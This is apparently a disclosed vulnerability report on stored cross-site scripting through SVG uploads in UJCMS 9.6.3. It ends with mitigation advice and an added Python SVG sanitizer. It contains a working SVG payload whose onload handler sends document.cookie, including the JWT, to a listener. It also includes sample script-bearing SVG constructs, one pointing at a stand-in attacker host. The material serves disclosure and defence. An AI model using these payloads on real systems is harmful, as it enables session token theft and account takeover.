
Stored XSS via SVG file uploads in UJCMS 9.6.3 allows JWT theft #11

@cydtseng

Description:

A Stored Cross-Site Scripting (XSS) vulnerability exists in the authenticated SVG file upload and viewing functionality of UJCMS 9.6.3. Uploaded SVG files are stored and later served without their contents being sanitized, so event-handler attributes such as onload survive intact. When another backend user views a crafted SVG, the embedded JavaScript runs in that user's browser within the backend application's origin, allowing an authenticated attacker with upload rights to execute arbitrary script and steal session material such as the jwt-access-token cookie.

Affected Component:

  • Endpoint: /cp/#/file/web-file-upload/
  • Application Version: 9.6.3

Type of Vulnerability:

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Impact:

  • Stored XSS: Attackers can execute arbitrary JavaScript in the victim's browser when they view the malicious SVG file.
  • JWT Theft: Sensitive tokens such as the jwt-access-token cookie can be read through document.cookie and exfiltrated, allowing the attacker to replay them and act as the victim until the token expires or is revoked.

Steps to Reproduce / PoC:

  • For local testing, log in to the backend and navigate to http://localhost:8080/cp/#/file/web-file-upload/.
  • Note that the jwt-access-token cookie is set without the HttpOnly flag, so it can be read from JavaScript through document.cookie.
  • Start a Python HTTP server on localhost port 8888 to receive the exfiltrated JWT.
  • Upload an SVG file whose root element carries an onload attribute containing JavaScript that exfiltrates document.cookie, for example (the local listener on port 8888 stands in for an attacker-controlled host):
<!-- onload fires as soon as the SVG document is rendered; mode: 'no-cors' lets the POST go out even though the listener returns no CORS headers -->
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('http://localhost:8888', {
    method: 'POST',
    mode: 'no-cors',
    body: document.cookie
});">
    <circle cx="50" cy="50" r="40"/>
</svg>
  • After clicking 'Browse' for the malicious SVG file, the onload handler fires and the cookies, including jwt-access-token, arrive at the attacker's listener.

Root Cause:

The application does not sanitize SVG file contents, so event-handler attributes such as onload (and, by the same logic, script elements and javascript: hrefs) are stored verbatim and rendered from the backend's own origin when a user views the file; the PoC reading document.cookie shows that the SVG executes with the backend's cookies in scope. Because SVG is an XML document format that browsers treat as active content, serving user-supplied SVG unsanitized is equivalent to serving user-supplied HTML. The missing HttpOnly flag on the jwt-access-token cookie compounds the issue by letting the injected script read the token directly, which turns a session-riding XSS into token theft that outlives the victim's browser session.

Mitigation Recommendations:

  1. SVG File Sanitization:
    Sanitize SVG files server-side at upload time using an allow-list of elements and attributes: remove script and foreignObject elements, every on* event-handler attribute (onload, onclick, ...), and any href or xlink:href that is not a same-document fragment. DOMPurify with its SVG profile can do this when run in Node with a DOM implementation, but a sanitizer in the application's own server-side stack is preferable; sanitizing only in the browser is bypassed by posting the file directly to the upload endpoint.

  2. Secure Cookie Attributes:
    Set the HttpOnly flag on the jwt-access-token cookie and other sensitive cookies so they cannot be read from JavaScript.
    Use the Secure flag to restrict cookies to HTTPS connections.
    Note that HttpOnly stops document.cookie exfiltration but not script that performs authenticated requests from the victim's browser, so it reduces rather than removes the impact of the XSS itself.

  3. Content Security Policy (CSP):
    Serve uploaded files with a Content-Security-Policy response header that forbids script (for example default-src 'none'; style-src 'unsafe-inline'); a CSP on the response applies when the SVG is opened as a document and blocks inline event handlers such as onload. Deploy a CSP on the backend pages as well to limit inline script and restrict resource loading to trusted origins.

  4. Strict Input Validation:
    Validate the declared content type and the actual contents of every upload rather than trusting the file extension, and reject files that are not well-formed documents of the expected type.

  5. Restrict SVG Rendering:
    Avoid rendering uploaded SVG files in the backend's origin: serve them with Content-Disposition: attachment (and X-Content-Type-Options: nosniff) so they download instead of rendering, or serve user uploads from a separate cookieless origin. Converting SVGs to a raster format such as PNG before display removes the scripting surface entirely.

  6. Token Revocation and Rotation:
    Use short-lived access tokens, rotate them regularly and implement a revocation mechanism; a JWT that cannot be revoked remains valid until its expiry even after the theft has been detected.
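As an added example, not UJCMS code and not part of this report, the following standalone Python script implements the allow-list sanitization recommended in item 1 and doubles as an upload-time check for the payload in the PoC: it parses the SVG as XML, removes any element outside a small allow-list (script and foreignObject never survive), strips every on* event-handler attribute, drops href values that are not same-document fragments and style attributes that load remote resources, and reports what it removed. Both sample documents are constructed here; the first is the report's PoC payload with cx spelled correctly. Only the standard library is used; for untrusted XML in production, defusedxml is the safer parser because ElementTree does not guard against entity-expansion denial of service.

```python
"""Allow-list SVG sanitizer for uploaded files (added example, not UJCMS code).

Anything not on the element allow-list is removed with its subtree, every
on* attribute is dropped, and href values must be same-document fragments.
The list of removed items doubles as a detector: non-empty means the
upload carried active content and can be rejected or quarantined.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # serialize without ns0: prefixes
ET.register_namespace("xlink", XLINK_NS)

# Purely presentational SVG elements. script, foreignObject, style, animate,
# set, image, iframe, embed, object ... are deliberately absent.
ALLOWED_TAGS = {
    "svg", "g", "defs", "symbol", "use", "title", "desc", "a",
    "path", "rect", "circle", "ellipse", "line", "polyline", "polygon",
    "text", "tspan", "linearGradient", "radialGradient", "stop",
    "clipPath", "mask", "marker", "pattern",
}

# CSS constructs that fetch remote resources or ran script in old engines.
_UNSAFE_STYLE = re.compile(r"url\s*\(|expression\s*\(|@import|javascript:", re.I)


def _local(qname):
    """'{http://www.w3.org/2000/svg}circle' -> 'circle'."""
    return qname.rsplit("}", 1)[-1]


def _clean_attrs(elem, removed):
    tag = _local(elem.tag)
    for name, value in list(elem.attrib.items()):
        local = _local(name).lower()          # also catches xlink:href, onLoad
        if (
            local.startswith("on")                                       # event handlers
            or (local == "href" and not value.strip().startswith("#"))   # javascript:, data:, remote
            or (local == "style" and _UNSAFE_STYLE.search(value))
        ):
            del elem.attrib[name]
            removed.append(f"{tag}@{local}")


def _clean(elem, removed):
    _clean_attrs(elem, removed)
    for child in list(elem):
        if _local(child.tag) not in ALLOWED_TAGS:
            elem.remove(child)                # drops the whole subtree
            removed.append(f"<{_local(child.tag)}>")
        else:
            _clean(child, removed)


def sanitize_svg(data):
    """Return (sanitized_svg_text, removed_items).

    Raises ValueError when the upload is not a well-formed SVG document and
    should be rejected outright rather than cleaned.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        raise ValueError(f"reject upload: not well-formed XML ({exc})") from exc
    if _local(root.tag) != "svg":
        raise ValueError("reject upload: root element is not <svg>")
    removed = []
    _clean(root, removed)
    return ET.tostring(root, encoding="unicode"), removed


# Constructed sample: the PoC payload from this report (cx spelled correctly).
POC_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('http://localhost:8888', {
    method: 'POST', mode: 'no-cors', body: document.cookie});">
    <circle cx="50" cy="50" r="40"/>
</svg>"""

# Constructed sample: other script-bearing constructs an allow-list must catch.
HOSTILE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>alert(document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text x="5" y="15">click</text></a>
  <foreignObject width="10" height="10"><body xmlns="http://www.w3.org/1999/xhtml" onload="alert(1)"/></foreignObject>
  <use href="#icon"/>
  <rect width="10" height="10" style="fill:url(http://attacker.invalid/a.svg#f)"/>
</svg>"""

if __name__ == "__main__":
    for sample in (POC_SVG, HOSTILE_SVG):
        clean, removed = sanitize_svg(sample)
        print("removed:", removed)
        print(clean, end="\n\n")
```

Running the script prints the sanitized output and the removed items for both samples; a non-empty list at upload time is the signal to reject or quarantine the file. The a and use elements are kept on the allow-list deliberately: they show that href filtering, not element removal, is what neutralises javascript: links while a same-document reference such as #icon survives.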
